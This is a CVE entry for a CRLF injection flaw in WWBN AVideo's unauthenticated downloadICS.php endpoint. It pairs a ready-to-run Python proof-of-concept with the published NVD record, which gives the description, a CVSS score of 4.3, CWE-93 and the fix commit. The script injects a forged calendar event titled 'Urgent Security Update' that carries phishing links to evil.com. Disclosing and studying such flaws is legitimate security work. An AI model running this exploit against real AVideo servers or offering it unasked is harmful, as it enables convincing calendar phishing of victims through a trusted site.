CVE-2026-43882

import requests # Target URL vulnerable to CRLF injection target_url = "http://<TARGET_HOST>/plugin/Scheduler/downloadICS.php" # Payload injects CRLF to break out of SUMMARY and add a new malicious event # Format: Original data + CRLF + END:VEVENT + CRLF + BEGIN:VEVENT + Malicious Data + CRLF + BEGIN:VEVENT (to close properly) payload_title = "Meeting\r\nEND:VEVENT\r\nBEGIN:VEVENT\r\nSUMMARY:Urgent Security Update\r\nDESCRIPTION:Please click http://evil.com/update\r\nLOCATION:http://evil.com\r\nEND:VEVENT\r\nBEGIN:VEVENT" params = { "title": payload_title, "description": "Check this out", "joinURL": "http://example.com" } print(f"Sending request to {target_url}...") response = requests.get(target_url, params=params) if response.status_code == 200: print("Response received. Checking for injected content...") if "Urgent Security Update" in response.text and "BEGIN:VCALENDAR" in response.text: print("[+] PoC successful! Malicious ICS content generated.") print("[+] Content preview:") print(response.text[:500]) else: print("[-] PoC failed. Injection not detected.") else: print(f"[-] Request failed with status code: {response.status_code}")

{"cve": {"id": "CVE-2026-43882", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:12.803", "lastModified": "2026-05-11T22:22:12.803", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, the unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines — including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim's trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim's calendar after import. Commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5 contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv", "source": "[email protected]"}]}}